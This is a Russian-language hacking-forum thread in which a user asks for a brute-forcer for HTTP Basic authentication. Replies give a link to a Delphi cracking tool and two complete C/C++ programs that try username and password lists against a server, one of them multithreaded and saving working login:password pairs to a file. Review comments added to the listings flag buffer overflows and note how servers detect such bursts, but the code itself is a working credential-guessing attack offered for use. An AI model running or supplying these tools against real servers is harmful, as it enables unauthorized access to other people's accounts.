брут для basic auth

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by Sharky, 21 Feb 2008.

  1. Sharky

    помогите написать брут для basic-auth на си си++ или дельфях
     
  2. z01b

    Я сомневаюсь, что кто-то здесь будет писать за тебя. Начинай, и если будут вопросы — задавай, юзеры постараются ответить.
     
  3. iddqd

    зачем изобретать велосипед?
    brutus aet2
     
  4. zl0y

    про велосипед вообще никто не спрашивал, не одобряю.
     
  5. Sharky

    если бы мне нужен был брутус, я бы не спрашивал... мне нужен свой консольный брут... искал в инете инфу, что-то ничего путного не нашёл
     
  6. bul.666

    юзай сокеты... Прими ответ от басика и там уже думай
     
  7. Jes

    то есть:

    "GET /private/index.html HTTP/1.0
    Host: localhost
    Authorization: Basic " + Convert.ToBase64String(new ASCIIEncoding().GetBytes(username + ":" + Password))

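    а именно: в заголовки запроса добавляется строка
    Authorization: Basic ... + строка вида «логин:пароль», закодированная в Base64. Base64 — это кодирование, а не шифрование: без TLS такие учётные данные идут по сети фактически открытым текстом.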
     
  8. Ch3ck

    _http://badnewsforyou.narod.ru/webhacker.rar
    Залил исходник(Делфе :cool: ) программы наподобие брутус ает
     
    #8 Ch3ck, 21 Feb 2008
    Last edited: 22 Feb 2008
  9. nerezus

    за $30 напишу
     
  10. Digimortal

    пример под линух by И.Скляров..
    Code:
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <string.h>
    
    /* Input lists that main() opens with fopen(); bare names, so they are
     * looked up in the current working directory. */
    #define USER "users.txt"
    #define PASS "words.txt"
    /* Request path that main() places in the GET line. */
    #define CATALOG "/admin/"
    
    /* Standard Base64 alphabet; base64Encode() indexes it with 6-bit values. */
    static char table64[]=
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    
    /* Results of token(): both point into the string handed to token(),
     * except that port_host points at the literal "80" when no port was given. */
    char *port_host;
    char *name;
    
    /*
     * Split a "host[:port]" argument in place.
     *
     * strtok() overwrites the first ':' after the host with a NUL, so the
     * caller's string is modified. `name` receives the host part and
     * `port_host` everything after that ':'; when nothing follows the host,
     * `port_host` falls back to "80".
     */
    void token(char *arg)
    {
      char *host_part = strtok(arg, ":");
      char *port_part = strtok(NULL, "");
    
      name = host_part;
      port_host = (port_part != NULL) ? port_part : "80";
    }
    
    /*
     * Base64-encode the NUL-terminated string `intext` into `output`.
     *
     * Input is consumed three bytes at a time; a short final group is padded
     * with '=' so every group yields exactly four output characters. The
     * result is NUL-terminated.
     *
     * There is no length parameter: the caller must provide room for
     * 4 * ceil(strlen(intext) / 3) + 1 bytes in `output`.
     */
    void base64Encode(char *intext, char *output)
    {
      while (*intext != '\0') {
        unsigned char in3[3] = {0, 0, 0};  /* missing bytes stay zero */
        unsigned char idx[4];
        int taken = 0;
    
        /* Pull up to three bytes, stopping at the terminator. */
        while (taken < 3 && *intext != '\0') {
          in3[taken++] = *intext++;
        }
    
        /* Regroup 3 x 8 bits into 4 x 6-bit alphabet indexes. */
        idx[0] = in3[0] >> 2;
        idx[1] = ((in3[0] & 0x03) << 4) | (in3[1] >> 4);
        idx[2] = ((in3[1] & 0x0F) << 2) | (in3[2] >> 6);
        idx[3] = in3[2] & 0x3F;
    
        output[0] = table64[idx[0]];
        output[1] = table64[idx[1]];
        output[2] = (taken > 1) ? table64[idx[2]] : '=';
        output[3] = (taken > 2) ? table64[idx[3]] : '=';
        output += 4;
      }
      *output = 0;
    }
    
    /*
     * Entry point. Usage: prog host[:port] [proxy][:port]
     *
     * For every non-empty line of USER and every non-empty line of PASS this
     * builds "user:pass", Base64-encodes it, opens a fresh TCP connection,
     * sends a GET for CATALOG with an "Authorization: Basic" header, reads at
     * most 249 bytes of the reply and prints the pair when the reply contains
     * "200 OK".
     *
     * With two arguments the connection goes to argv[2] (the proxy) and the
     * request line carries an absolute URL built from argv[1]; with one
     * argument it goes to argv[1] directly.
     *
     * Seen from the server this is one short-lived connection and one request
     * with an Authorization header per pair; presumably rejected pairs are
     * answered with 401, so the access log shows a dense run of them from one
     * client, which is what lockout and rate-limit rules key on.
     *
     * NOTE(review): exit(), atoi(), close() and bzero() are used but the
     * listing includes none of <stdlib.h>, <unistd.h>, <strings.h>.
     */
    int main(int argc, char **argv)
    {
      FILE *fd1, *fd2;
      int sd, bytes;
      char buf1[250], buf2[250];
      char buf[250];
      char str1[270], str2[100];
      struct hostent* host;
      struct sockaddr_in servaddr;
      char rez[2000];
      char c[600];
    
      if (argc < 2 || argc > 3) {
        fprintf(stderr, "Usage: %s host[:port] [proxy][:port]\n\n", argv[0]);
        exit(-1);
      }
    
      /* token() splits the argument in place: after this call the chosen argv
       * string ends at its ':' and `name` / `port_host` point into it. */
      if (argc == 3)
        token(argv[2]);
      else
        token(argv[1]); 
    
      if ( (host = gethostbyname(name)) == NULL) {
        herror("gethostbyname() failed");
        exit(-1);
      }
    
      bzero(&servaddr, sizeof(servaddr));
      servaddr.sin_family = AF_INET;
      /* NOTE(review): atoi() gives no error indication, so a non-numeric or
       * out-of-range port string is not rejected here. */
      servaddr.sin_port = htons(atoi(port_host));
      servaddr.sin_addr = *((struct in_addr *)host->h_addr);
    
      /* NOTE(review): fd1 is never passed to fclose(). */
      if ( (fd1 = fopen(USER, "r")) == NULL) {
        perror("fopen() failed");
        exit(-1);
      }
    
      while(fgets(buf1, 250, fd1) != NULL)
      {
        /* Cut the line at the first CR, LF or TAB; skip lines left empty. */
        buf1[strcspn(buf1, "\r\n\t")] = 0;
        if (strlen(buf1) == 0) continue;
    
        /* PASS is reopened for every username. NOTE(review): fd2 is never
         * closed, so one FILE handle leaks per line of USER. */
        if( (fd2 = fopen(PASS, "r")) == NULL) {
          perror("fopen() failed");
          exit(-1);
        }
    
        while(fgets(buf2, 250, fd2) != NULL)
        {
          buf2[strcspn(buf2, "\r\n\t")] = 0;
          if (strlen(buf2) == 0) continue;
    
          /* At most 249 + 1 + 249 bytes, which fits c[600]; the Base64 form of
           * that fits rez[2000]. */
          sprintf(c, "%s:%s", buf1, buf2);
          base64Encode(c, rez);
    
          if ( (sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
    	perror("socket() failed");
    	exit(-1);
          }
            
          if (connect(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1) {
    	perror("connect() failed");
    	exit(-1);
          }
    
          /* NOTE(review): argv[1] is copied into str1[270] with an unbounded
           * sprintf(); a long first argument overruns the buffer. */
          if (argc == 2)
    	sprintf(str1, "GET %s HTTP/1.1\r\n", CATALOG);
          else
    	sprintf(str1, "GET http://%s%s HTTP/1.1\r\n", argv[1], CATALOG);
    
          /* NOTE(review): stack buffer overflow. str2 holds 100 bytes, while
           * the fixed header text, argv[1] and rez (several hundred bytes for
           * long input lines) are written with an unbounded sprintf(). */
          sprintf(str2, "Host:%s\r\nAuthorization: Basic %s\r\n\r\n", argv[1], rez);
    
          /* NOTE(review): the return values of both send() calls are ignored. */
          send(sd, str1, strlen(str1), 0);
          send(sd, str2, strlen(str2), 0);
    
          bzero(buf, 250);
        
          /* NOTE(review): recv() returns -1 on error, which makes the next line
           * write to buf[-1]; the result must be checked before indexing. */
          bytes = recv(sd, buf, sizeof(buf)-1, 0);
          buf[bytes] = 0;
    
          if (strstr(buf, "200 OK") != NULL) {
            printf("======================================\n");
            printf("%s", str1);
         
            printf("%s\n", str2);
    	printf("Result OK: %s\n", c);
            printf("======================================\n");
          }
        
          close(sd); 
        }
      }
    
      return 0;
    }
     
  11. nc.STRIEM

    Тоже написал
    Code:
    #include <winsock2.h>
    #include <stdio.h>
    #include <conio.h>
    
    #pragma comment(lib,"ws2_32")
    
    // Request template: path, Host value, Base64 credentials.
    #define PACK			"GET %s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\n\r\n"
    // Number of slots in the `pass` array.
    #define KR				128
    
    ////////////////////////////////////////////////////////////////////////
    // Password list, opened by main() and read by READ().
    FILE *fr;
    // PACK with path and host filled in by main() and a "%s" left for the
    // credentials; check() then uses it as a format string.
    // NOTE(review): only 128 bytes, while path and host may each be up to 127
    // characters and are written with an unbounded sprintf() in main().
    char pack[128];
    // Count of check() threads currently running; incremented by main(),
    // decremented by check().
    // NOTE(review): this and the counters below are plain ints updated from
    // several threads with no synchronization visible in this listing.
    int CurThr;
    // Target address and its size, filled in by main() and used by connect().
    sockaddr_in ClientService;
    int CLsize;
    // Copies of argv[1] and argv[2].
    char host[128];
    char path[128];
    // Thread limit, from argv[3].
    int THR;
    // Outstanding-work counter: starts at 1 in main(), incremented per slot
    // filled by READ(), decremented by check() and once at the end of READ().
    int PL;
    // info() keeps redrawing while this is non-zero; main() clears it at exit.
    int so;
    // Counters shown by info(): "200 OK" replies, other replies, socket errors.
    int p_good, p_bad, p_er;
    // Ad-hoc "result file busy" flag used by check(); not a lock.
    int fl;
    // Result file name, copied from argv[5].
    char fwr[128];
    // One work slot: p is a "login:password" line, st == 1 means the slot
    // holds an unchecked line, tr == 1 means a check() thread owns the slot.
    struct pp{
    	char p[128];
    	int st;
    	int tr;
    };
    // Array of KR slots allocated in main().
    pp *pass;
    
    
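    // Standard Base64 alphabet, indexed by 6-bit value.
    static const unsigned char base64digits[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    
    // Reverse table: ASCII code (0..127) -> 6-bit value, BAD for any
    // character outside the alphabet.
    #define BAD 255
    static const unsigned char base64val[] = {
        BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
        BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
        BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD, 62, BAD,BAD,BAD, 63,
        52, 53, 54, 55,  56, 57, 58, 59,  60, 61,BAD,BAD, BAD,BAD,BAD,BAD,
        BAD,  0,  1,  2,   3,  4,  5,  6,   7,  8,  9, 10,  11, 12, 13, 14,
        15, 16, 17, 18,  19, 20, 21, 22,  23, 24, 25,BAD, BAD,BAD,BAD,BAD,
        BAD, 26, 27, 28,  29, 30, 31, 32,  33, 34, 35, 36,  37, 38, 39, 40,
        41, 42, 43, 44,  45, 46, 47, 48,  49, 50, 51,BAD, BAD,BAD,BAD,BAD
    };
    // Argument parenthesized so an expression can be passed; it is still
    // evaluated more than once, so pass nothing with side effects.
    #define DECODE64(c)  (((c) > 32 && (c) < 127) ? base64val[(int)(c)] : BAD)
    
    // Base64-encode `inlen` bytes from `in` into `out` and NUL-terminate.
    //
    // Returns a pointer to the terminating NUL written into `out`, so the
    // encoded length is (return value - out). `out` must have room for
    // 4 * ceil(inlen / 3) + 1 bytes; the function cannot check that itself.
    //
    // Bytes are read as unsigned char. With a plain (possibly signed) char,
    // any byte >= 0x80 produced a negative index into base64digits, i.e. an
    // out-of-bounds read and garbage output for non-ASCII input.
    char* en64 (const char *in, char *out, int inlen)
    {
        const unsigned char *src = (const unsigned char *)in;
    
        while (inlen > 0)
        {
            // Bytes past the end of the input are treated as zero and never read.
            unsigned b0 = src[0];
            unsigned b1 = (inlen > 1) ? src[1] : 0;
            unsigned b2 = (inlen > 2) ? src[2] : 0;
    
            *out++ = base64digits[b0 >> 2];
            *out++ = base64digits[((b0 & 3) << 4) | (b1 >> 4)];
            *out++ = (inlen > 1) ? base64digits[((b1 << 2) & 0x3c) | (b2 >> 6)] : '=';
            *out++ = (inlen > 2) ? base64digits[b2 & 0x3f] : '=';
    
            // Advance only over bytes that exist, so the pointer never moves
            // beyond one past the end of the input.
            src += (inlen < 3) ? inlen : 3;
            inlen -= 3;
        }
        *out = '\0';
        return out;
    }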
    
    
    // Worker thread for one slot: sends the request with the slot's
    // credentials and records whether the reply contains "200 OK".
    //
    // `i` is the slot index, passed by main() as an integer cast to LPVOID.
    // Returns true after a request/response exchange, false when connect()
    // or send() failed.
    //
    // NOTE(review): every counter and slot field touched here is shared with
    // other threads and is updated without any lock or atomic operation.
    DWORD  WINAPI check(LPVOID i)   
    {
    	char header[256];
    	// p holds at most 127 characters, so its Base64 form (172 + NUL) fits.
    	char b64t[200];
    	en64(pass[(int)i].p, b64t, strlen(pass[(int)i].p));
    	// NOTE(review): `pack` is a format string assembled at run time from the
    	// path and host arguments, so a '%' in either is interpreted as a
    	// conversion here. The write is also unbounded: pack (up to 127 bytes)
    	// plus b64t (up to 172) does not fit header[256].
    	sprintf(header, pack,   b64t);
    	SOCKET ksocket;
    	int len;
    	char buff[32];
    	FILE *fw;
    
    		// NOTE(review): the result of socket() is not checked.
    		ksocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    		if(connect( ksocket, (SOCKADDR*) &ClientService, CLsize ) == SOCKET_ERROR)
    		{
    			// st stays 1, so the dispatch loop in main() will pick this slot
    			// again. NOTE(review): the socket is not closed on this path.
    			pass[(int)i].tr = 0;
    			CurThr--;
    			p_er++;
    			return false;
    		}
    		len = send(ksocket, header, strlen(header), 0);
    		if(len == SOCKET_ERROR)
    		{
    			// Same as above: slot left for a retry, socket not closed.
    			pass[(int)i].tr = 0;
    			CurThr--;
    			p_er++;
    			return false;
    		}
    		// NOTE(review): recv() may return 32, which writes buff[32] (one past
    		// the end), or SOCKET_ERROR, which writes buff[-1]. Read at most
    		// sizeof(buff) - 1 bytes and check the result before indexing.
    		buff[recv(ksocket, buff, 32, 0)] = '\0';
    
    		if(strstr(buff, "200 OK") != NULL)
    		{
    			// `fl` is a plain int used as a "file busy" hint; it does not
    			// stop two threads from appending at the same time.
    			if(fl) Sleep(50);
    			fl=1;
    			// NOTE(review): fopen() can fail; fw is used unchecked.
    			fw=fopen(fwr, "ab");
    			fprintf(fw,"%s\n", pass[(int)i].p);
    			fclose(fw);
    			fl=0;
    			p_good++;
    		}
    		else p_bad++;
    		closesocket(ksocket); 
    
    		// Release the slot so READ() can refill it.
    		pass[(int)i].st=0;
    		pass[(int)i].tr = 0;
    		CurThr--;
    		PL--;
    	return true;
    }
    
    
    // Reader thread: clears all KR slots, then walks them in a ring and loads
    // one line of the password file into each free slot until end of file.
    // The parameter `x` is not used.
    //
    // NOTE(review): when no slot is free the loop spins without sleeping, and
    // the slot fields are shared with main() and check() without any lock.
    DWORD  WINAPI READ(LPVOID x) 
    {
    	int i;
    
    	for(i=0; i<KR; i++)
    	{
    		pass[i].st=0;
    		pass[i].tr=0;
    	}
    	i=0;
    	// NOTE(review): feof() only becomes true after a read has already
    	// failed, and the fgets() result below is not checked, so the last
    	// pass through marks a slot ready although nothing new was read into it.
    	while(!feof(fr))
    	{
    		if(i >= KR)	i=0;
    
    		// Free slot: not holding a pending line and not owned by a thread.
    		if(pass[i].st == 0 && pass[i].tr == 0)
    		{
    			fgets(pass[i].p, 128, fr);
    			// Cut the line at the first CR, LF or TAB.
    			pass[i].p[strcspn(pass[i].p, "\r\n\t")] = 0;
    			pass[i].st=1;
    			PL++;
    		}
    		i++;
    	}
    	// Presumably balances the PL=1 that main() sets before starting this
    	// thread; confirm against the dispatch loop.
    	PL--;
    	// NOTE(review): main() also calls fclose(fr) before exiting, so the
    	// stream is closed twice.
    	fclose(fr);
    	
    	return true;
    }
    
    
    // Status thread: clears the console and reprints the target and the
    // counters every 500 ms for as long as the global `so` is non-zero.
    // The parameter `x` is not used.
    DWORD  WINAPI info(LPVOID x) 
    {
    	for(;;)
    	{
    		// main() clears `so` to end the display loop.
    		if(!so) break;
    
    		system("cls");
    		printf("Target: %s%s\n", host, path);
    		printf("Thread: %d/%d\n", CurThr, THR);
    		printf("Founr: %d\n", p_good);
    		printf("Bad: %d\n", p_bad);
    		printf("Error: %d\n", p_er);
    		Sleep(500);
    	}
    	return true;
    }
    
    
    // Entry point. Arguments: host path threads passwordFile resultFile.
    //
    // Resolves the host, starts the READ() and info() threads, then walks the
    // slot ring and starts one check() thread per pending slot while fewer
    // than THR are running. The loop ends once PL and CurThr are both zero.
    //
    // Seen from the server this is up to THR parallel short-lived connections
    // to port 80, each carrying one Authorization header; presumably rejected
    // pairs are answered with 401, so the access log shows a burst of them
    // from one client, which is what lockout and rate-limit rules key on.
    int main(int argc, char *argv[])
    {
    
    	if(argc < 6)
    	{
    		printf("USE: host path tread filePass fileResult\n");
    		return 0;
    	}
    
    	// NOTE(review): host, path and fwr are 128-byte globals and strcpy()
    	// does not bound the copy; a longer argument overruns them.
    	strcpy(host, argv[1]);
    	strcpy(path, argv[2]);
    	// NOTE(review): atoi() reports no errors; 0 or a negative value makes
    	// the CurThr >= THR test below true forever.
    	THR=atoi(argv[3]);
    	strcpy(fwr, argv[5]);
    	
    	fr=fopen(argv[4], "rb");
    	if(!fr)
    	{
    		printf("File not found\n");
    		return 0;
    	}
    
    	WSADATA wsaData;
    	if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
    	{
    		printf("Error at WSAStartup()\n");
    		return 0;
    	}
    
    	struct hostent *Ip = gethostbyname(host);
    	if(Ip == NULL) 
    	{
    		printf("Error at gethostbyname()\n");
    		return 0;
    	}
    	ClientService.sin_family = AF_INET;
    	// The resolved address is converted to text and parsed back again.
    	ClientService.sin_addr.s_addr = inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
    	// Port is fixed at 80.
    	ClientService.sin_port = htons(80);
    	CLsize=sizeof(ClientService);
    
    	DWORD thID;
    	// NOTE(review): never released with delete[].
    	pass = new pp[KR];
    	CurThr=0;
    	p_good=0;
    	p_bad=0;
    	p_er=0;
    	int i=0;
    	PL=1;
    	so=1;
    	fl=0;
    	// Fill in path and host now and leave a literal "%s" for the credentials.
    	// NOTE(review): unbounded write into pack[128]; path and host may each
    	// be up to 127 characters. The result is later used as a format string
    	// in check(), so a '%' in path or host changes how it is interpreted.
    	sprintf(pack, PACK, path, host, "%s");
    	// NOTE(review): the handles returned by CreateThread() are discarded and
    	// never closed, here and in the loop below.
    	CreateThread(0, 0, READ, (LPVOID)0, 0, &thID); 
    
    	CreateThread(0, 0, info, (LPVOID)0, 0, &thID);
    	// Gives READ() a second to fill slots before dispatching starts.
    	Sleep(1000);
    	while(PL != 0 || CurThr != 0)
    	{
    		if(CurThr >= THR)
    		{
    			Sleep(100);
    			continue;
    		}
    		if(i >= KR)	i=0;
    		// Pending line that no thread owns yet: claim the slot and start a worker.
    		if(pass[i].st == 1 && pass[i].tr == 0)
    		{
    			pass[i].tr = 1;
    			CurThr++;
    			CreateThread(0, 0, check, (LPVOID)i, 0, &thID);
    		}
    		i++;
    	}
    
    	// NOTE(review): READ() already closed fr; this is a second fclose() on
    	// the same stream.
    	fclose(fr);
    	Sleep(1000);
    	so=0;
    	system("pause");		
    	return 1;
    }
    
    USE: host path tread filePass fileResult
    например
    brut.exe localhost /1.php 50 pass.txt result.txt

    файл с паролями в формате
    Code:
    логин:пароль
    логин:пароль
    логин:пароль
    
     
    #11 nc.STRIEM, 24 Feb 2008
    Last edited: 24 Feb 2008